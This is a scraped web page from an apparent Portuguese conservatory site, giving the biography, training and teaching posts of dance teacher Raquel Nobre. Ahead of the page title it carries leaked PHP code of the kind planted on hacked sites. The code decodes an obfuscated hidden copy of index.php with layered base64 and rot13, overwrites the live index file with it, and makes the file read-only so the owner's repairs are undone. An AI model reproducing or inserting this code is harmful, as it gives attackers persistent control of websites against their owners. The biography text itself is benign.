$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Raquel Nobre – Dança – Conservatório Regional do Baixo Alentejo

Raquel Nobre – Dança

Natural de Évora, iniciou a sua formação artística na Companhia de Dança Contemporânea de Évora. Mais tarde fez a sua formação académica na Escola Superior de Dança – Instituto Politécnico de Lisboa onde terminou a Licenciatura em dança (área de espetáculo) e o Mestrado em Ensino de Dança. Estagiou na Companhia Portuguesa de Bailado Contemporâneo, e dançou na Companhia de Dança de Lisboa.

Tem vindo sempre a realizar várias formações complementares com base em novas técnicas de dança contemporânea, nomeadamente: em Londres, no Trinity Laban Summer Dance School Release com Tina Krasevec e Lindsey McConville, Contact Improvisation com Kathy Crick, Contemporary Jazz com Hagit Yakira, entre outros; em Coimbra, no II Estágio – LABarts – Escola de Artes do Corpo – Contemporâneo Suspenso com Magalie Lanriot, Contemporâneo e Repertório Contemporâneo com Lorand Zachar, entre outros; em Bruxelas, na P.A.R.T.S. Summer School Classical Ballet Technique com Libby Farr, Actings Body, Dancing Body com Dominique Duszynski ex-bailarina da Pina Bausch, Contemporary Technique com Timea Maday, Power Sources & Tools for Partnering com Laura Aris, entre outros.

Desde 2010 que leciona no Conservatório Regional do Baixo Alentejo. Organiza workshops periodicamente, e leciona ainda na Associação de Dança e Arte Companhia de Triana em Évora, na Academia de Dança de Reguengos de Monsaraz, na Companhia de Dança Contemporânea de Évora, e na Casa das Artes em Arraiolos.

Leave a Reply

Your email address will not be published.